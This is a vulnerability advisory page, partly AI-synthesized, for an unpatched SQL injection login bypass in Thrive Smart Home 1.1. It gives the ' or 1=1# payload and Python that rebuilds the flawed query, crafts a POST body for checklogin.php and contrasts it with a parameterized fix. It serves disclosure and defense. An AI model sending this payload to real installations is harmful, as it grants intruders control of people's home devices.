CVE-2019-25325
Description
Thrive Smart Home 1.1 contains an SQL injection vulnerability in the checklogin.php endpoint that allows unauthenticated attackers to bypass authentication by manipulating the 'user' POST parameter. Attackers can inject malicious SQL code like ' or 1=1# to manipulate login queries and gain unauthorized access to the application.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An unauthenticated SQL injection in Thrive Smart Home 1.1's checklogin.php lets attackers bypass authentication entirely.
Thrive Smart Home 1.1, a home automation system, suffers from an SQL injection vulnerability in the checklogin.php script. The 'user' POST parameter is concatenated directly into the login query without sanitization or parameterization, so an attacker controls part of the query text and can change its logic [3][4]. This is a classic authentication bypass: the input is never validated or bound as data before it reaches the database.
Attackers do not need any authentication to exploit this vulnerability. By sending a crafted POST request to the login endpoint with a malicious payload like ' or 1=1# in the 'user' field, the injected SQL code alters the query to always return a valid result, effectively bypassing the credential check [1][3]. No special network position is required; the attack can be performed remotely over HTTP.
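The following is an added example, not code from Thrive Smart Home or from the advisory. It reproduces the flawed pattern described above (request values spliced into the SQL string) against a constructed SQLite table, shows the query text the ' or 1=1# payload produces, and places a parameterized login beside it. The table and column names, the second form field ('pass'), and the sample accounts are assumptions. Because # is MySQL's comment marker and SQLite only recognises --, the executed bypass uses the -- variant; the effect on the query is the same.

```python
import sqlite3
from urllib.parse import urlencode

# Constructed sample accounts (not data from the advisory or the product).
SAMPLE_USERS = [("admin", "S3cret!"), ("guest", "guest")]

# The page's payload, MySQL comment syntax, and the SQLite-compatible variant.
MYSQL_PAYLOAD = "' or 1=1#"
SQLITE_PAYLOAD = "' or 1=1--"


def setup_db():
    """In-memory SQLite database with an assumed users(username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_vulnerable_query(user, password):
    """Mirror the flaw: POST values are concatenated straight into the SQL text.
    With user = "' or 1=1#" the quote closes the literal, 'or 1=1' makes the
    WHERE clause always true, and '#' comments out the password check."""
    return ("SELECT * FROM users WHERE username='" + user
            + "' AND password='" + password + "'")


def vulnerable_login(conn, user, password):
    """Authenticate with the concatenated query; any returned row counts as a login."""
    row = conn.execute(build_vulnerable_query(user, password)).fetchone()
    return row is not None


def safe_login(conn, user, password):
    """Hardened form: the driver binds both values as data, so quotes and
    comment markers in them cannot change the query structure."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (user, password),
    ).fetchone()
    return row is not None


def craft_bypass_body(password_field="pass"):
    """URL-encoded POST body for checklogin.php. The 'user' name comes from the
    advisory; the password field name is an assumption."""
    return urlencode({"user": MYSQL_PAYLOAD, password_field: "x"})


if __name__ == "__main__":
    db = setup_db()
    print("query sent to MySQL:", build_vulnerable_query(MYSQL_PAYLOAD, "x"))
    print("POST body:", craft_bypass_body())
    print("vulnerable login, bogus creds + payload:",
          vulnerable_login(db, SQLITE_PAYLOAD, "anything"))
    print("parameterized login, same input:",
          safe_login(db, SQLITE_PAYLOAD, "anything"))
```

Note that hashing the password before the comparison would not help here: the injection lands in the 'user' field and comments the password predicate out of the query entirely. Only binding the values as parameters (or an equivalent escaping layer) removes the attacker's control over the query text.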
Successful exploitation grants the attacker access to the Thrive Smart Home application's authenticated interface without valid credentials. From there an attacker could control smart home devices, read configuration data, or use the host as a foothold for further movement in the network. The vulnerability was discovered and reported by Gjoko 'LiquidWorm' Krstic of Zero Science Lab [1][4].
Public exploit code exists on multiple platforms [3][4], and the attack requires only a single crafted POST request. No patch is listed for Thrive Smart Home 1.1. In its absence, restrict network access to the web interface so that checklogin.php is not reachable from untrusted networks, watch for POST requests to that endpoint whose 'user' field contains quote characters or SQL comment markers, and consider replacing the system.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Thrive Smart Home, version = 1.1
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- [1] cxsecurity.com/issue/WLB-2020010019 (nvd)
- [2] exchange.xforce.ibmcloud.com/vulnerabilities/173728 (nvd)
- [3] packetstorm.news/files/id/155797 (nvd)
- [4] www.exploit-db.com/exploits/47814 (nvd)
- [5] www.vulncheck.com/advisories/thrive-smart-home-smart-home-improper-limitation-o (nvd)
- [6] www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php (nvd)
News mentions
No linked articles in our index yet.